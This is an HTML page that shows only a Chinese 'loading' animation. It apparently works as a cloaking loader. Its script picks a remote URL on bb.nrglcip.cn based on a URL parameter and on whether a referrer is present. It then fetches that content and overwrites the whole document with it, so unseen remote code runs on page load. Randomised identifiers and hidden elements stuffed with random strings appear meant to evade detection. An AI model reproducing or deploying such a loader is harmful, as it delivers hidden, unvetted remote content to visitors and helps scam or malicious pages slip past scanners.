<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zrKEH2xxz4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zrKEH2xxz4 .LeoE7lRU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zrKEH2xxz4 .content {
            line-height: 50px;
            text-align: center
        }

        .zrKEH2xxz4 .img {
            width: 100%
        }

        .zrKEH2xxz4 .aGwp8N {
            text-align: center
        }

        .zrKEH2xxz4 .aGwp8N span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zrKEH2xxz4 .aGwp8N span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zrKEH2xxz4 .aGwp8N span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zrKEH2xxz4 .aGwp8N span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zrKEH2xxz4 .aGwp8N span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zrKEH2xxz4 .aGwp8N span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zrKEH2xxz4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function K0XUCeoc8SkN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ofQ8N3G = K0XUCeoc8SkN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ofQ8N3G +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ofQ8N3G +".html?a=share";
		}
		
        DhqiNaR5sv=url+"#"+new Date().getTime();
        DhqiNaR5sv && function() {
            $.get(DhqiNaR5sv, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >hk8jjrpCJMGHYCkAmdtLzKuCjiQvn5ABzR7WkPP8</b>
<li style='display:none' >yvaUDCQkLSUkZWKFwRh7VLUiV9ehMDLeAGBFtAc8Qss</li>
<img  src='' style='display:none'>
<li style='display:none' >yvaUDCQkLSUkZWKFwRh7VLUiV9ehMDLeAGBFtAc8Qss</li>
<a  href='#' style='display:none'>uazk9GGIAQ4xq0hlFXJA3q0SPXl5LQ0GYlT5L8iEXLrQyQqaSFOvrKSnbz1n</a>
<p  style='display:none'>ku7DMLaiul51SYlKMxWgE</p>
<a  href='#' style='display:none'>uazk9GGIAQ4xq0hlFXJA3q0SPXl5LQ0GYlT5L8iEXLrQyQqaSFOvrKSnbz1n</a>
<div style='display:none'>HC1Y5w70qwidy141Itsq2J6Lzm5syjhsmV6BjXk2j86bXbW</div>
<a  href='#' style='display:none'>uazk9GGIAQ4xq0hlFXJA3q0SPXl5LQ0GYlT5L8iEXLrQyQqaSFOvrKSnbz1n</a>
<div style='display:none'>HC1Y5w70qwidy141Itsq2J6Lzm5syjhsmV6BjXk2j86bXbW</div><div class="zrKEH2xxz4">
    <div class="LeoE7lRU">
        <div class="aGwp8N">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>jxkmZtGZ7JARomwZRR0qm3a9OxGK9j7Qpstn9chNTHsv002QKPHALNyUItehyFt6Ks4t8EM2JIeL92Ezuz</div>
<h1 style='display:none' >QkacKKvqur0SW0fCggU5fMoRTzIrlb2uoycM3Zo034EOXx9GSEp3jl6CRUMeh2W7rDT53Ztw</h1>
<span style='display:none'>ltgQ2IVK5Lyh</span>
<li style='display:none' >Lz4ShLMfwAeJ9BifChmtuniLjGVYQmIcyslmh4iuo1swsryY0qKZ9ETokbPaVSYfaRrqDsrF4</li>
<a  href='#' style='display:none'>jSlfC18jfBle4orhOFBii54na0Oid7bQfYtAlSLXrhEIGaF3AQsQOq</a></body>
</html>